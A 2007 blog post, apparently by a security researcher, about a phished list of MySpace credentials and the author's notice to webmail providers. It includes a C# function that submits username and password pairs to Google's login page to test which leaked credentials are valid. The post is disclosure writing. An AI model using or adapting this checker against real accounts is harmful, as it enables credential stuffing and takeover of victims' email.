If at first you don't succeed; call it version 1.0
Tuesday, 16 January 2007

Yesterday, a huge list of MySpace accounts’ usernames and passwords was revealed to the public. This list was harvested by phishers.
Most of those MySpace accounts’ usernames are emails of the following webmail accounts: GMAIL, Hotmail, Yahoo! Mail and AOL.
Some of those poor MySpace users are probably using the same password in their MySpace account for their webmail account, and probably for other web services too (ebay/Amazon/etc).
Brute forcing those web services to extract the valid credentials from the phishers list is very easy. So, I’ve decided to first contact the webmail vendors (Google, Microsoft, Yahoo and AOL) and ask them to analyze the phishers list against their own database in order to warn the poor users to change their passwords as soon as possible.
Over 21 hours later, and only AOL have responded to my suggestion/request.
AOL's response (10 minutes after I’ve sent the mail!) :

Hi Aviv,

Thank you for the notification.  We noticed this on the Full-Disclosure list as well.  We will do everything we can to protect these users.

Thank you,

Kent L.
AOL Product Vulnerabilities

Just to demonstrate how easy is to extract the valid username/password from the phishers list, the following are 20 lines of C# code which validates username and password of a GMAIL account:

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
private static int IsValidGmailLogin(string username, string password)
   HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create("https://www.google.com/accounts/ServiceLoginAuth");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://www.google.com/accounts/ServiceLogin";
   request.ContentType = "application/x-www-form-urlencoded";
   string data = "?service=mail&Email=" + username + "&Passwd=" + password + "&rm=false&null=Sign%20in&continue=https://mail.google.com/mail?ui=html&zy=l";
   request.ContentLength = data.Length;
   StreamWriter reqStream = new StreamWriter(request.GetRequestStream());
   reqStream.Write(data, 0, data.Length);
   HttpWebResponse response = (HttpWebResponse)request.GetResponse();
   StreamReader sr = new StreamReader(response.GetResponseStream());
   string resp = sr.ReadToEnd();
   return (resp.IndexOf("location.href") > -1) ? 1 : (resp.IndexOf("<form action=\"LoginAuth\"") > -1) ? 0 : -1;

Tuesday, 16 January 2007 19:04:06 UTC | Comments [1] | .NET | Security#
Tuesday, 08 May 2007 11:41:10 UTC
How do you know which URL and referer id to send to GMail/Yahoo mail?
Comments are closed.     
Send me an Email
Follow me on Twitter
RSS Feeds
Admin Login
Sign In
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.